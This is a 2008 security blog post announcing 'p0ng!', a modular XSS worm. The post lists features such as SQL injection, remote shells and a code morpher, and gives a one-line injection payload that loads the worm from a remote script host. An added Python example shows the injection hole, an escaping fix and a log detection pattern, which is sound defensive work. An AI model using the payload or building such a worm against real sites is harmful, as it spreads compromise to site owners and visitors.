After the Diminutive XSS Worm Replication Contest, I got the idea of writing a universal XSS worm that can be applied in almost any situation or location. No, that was a joke. I had the idea for a long time, but never got around to actually writing something like it. The biggest issue regarding web application worms isn't the worm size, but the hole that lets it propagate.
With remote JavaScript files we can go any place and any size we want to. The only trigger we need is a simple <script/> instance to let it become part of the website and its DOM. We only have to call the remote JavaScript file each time, and we can adjust or modify the payload of the worm at any time.
The downside? Well, actually there isn't one. One might argue that they could block the remote JavaScript file, but by the time they find out a worm is hitting their system, it's usually too late. Many worms only need a few seconds to become an annoyance that is nearly impossible to contain. But p0ng! (as this worm is called) is different. It tries to propagate itself through SQL injection and PHP code injection, and also tries to fetch remote shells to upload new copies of itself. Well, that's gonna be nasty to mitigate!
How to propagate it:

"><script src='http://www.acme.com/p0ng.js'></script>

That's usually enough in most XSS holes. Really, besides tailoring the worm to one's needs of course.
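From the defending side, an added example that is not part of the original post: the injection string quoted above is dropped into a raw attribute template and into an attribute-encoded one, and a small access-log check flags requests that carry a remote-script include. The `/search?q=` endpoint, the IP addresses and the log lines are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# The injection string quoted in the post, copied here purely as test input.
PAYLOAD = "\"><script src='http://www.acme.com/p0ng.js'></script>"

def render_attr_unsafe(value: str) -> str:
    """The hole: a reflected value dropped raw into a quoted attribute."""
    return '<input type="text" name="q" value="%s">' % value

def render_attr(value: str) -> str:
    """The fix: html.escape(quote=True) encodes & < > " and ', so the value
    can neither close the attribute nor open a <script> element."""
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)

def is_inert(rendered: str) -> bool:
    """True when no <script tag survives in the rendered markup."""
    return "<script" not in rendered.lower()

# Detection side: a remote-script include arriving in a query string.
# Matches raw and percent-encoded forms; the input is URL-decoded once first,
# so a double-encoded %253C still shows up as %3C and is caught too.
REMOTE_SCRIPT = re.compile(r"(?:<|%3C)script[^>]*src\s*=", re.IGNORECASE)

def flag_requests(log_lines):
    """Return the access-log lines whose request carries a <script src=...> include."""
    return [line for line in log_lines if REMOTE_SCRIPT.search(unquote(line))]

# Constructed access-log lines (hypothetical /search endpoint and client IPs).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /search?q=hello HTTP/1.1" 200',
    '10.0.0.9 - - "GET /search?q=%22%3E%3Cscript%20src%3D%27http%3A%2F%2F'
    'www.acme.com%2Fp0ng.js%27%3E%3C%2Fscript%3E HTTP/1.1" 200',
    '10.0.0.7 - - "GET /search?q=%3Cb%3Ebold%3C%2Fb%3E HTTP/1.1" 200',
]

if __name__ == "__main__":
    print("unsafe inert? ", is_inert(render_attr_unsafe(PAYLOAD)))  # False
    print("encoded inert?", is_inert(render_attr(PAYLOAD)))         # True
    print("flagged:", flag_requests(SAMPLE_LOG))                    # the 10.0.0.9 line
```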
A couple of functionalities:
- SQL injection
- DOM session & global storage (thanks Firefox)
- Remote shells (shell.php? turns victims into new hosts)
- Automatic form fillers
- JavaScript source code morpher
- ... tons of other useful features for a decent worm.
The reason I wrote this universal worm was out of sheer fun. I don't care what anyone else does with it. If bad guys wanted to write something like it, they would have done that already. But screw this disclaimer! It's no magic! It is meant to learn from, and I hope the lesson will be that there is no way of stopping worms unless you just fix your holes.
It is as simple as that. p0ng! doesn't come as a worm out of a can; it needs preparation, a goal and a vulnerable website. I hope you enjoy it. Until next time: stay tuned and stay safe!
Writing A Modular Universal XSS Worm.
By secgeeks - Posted on January 23rd, 2008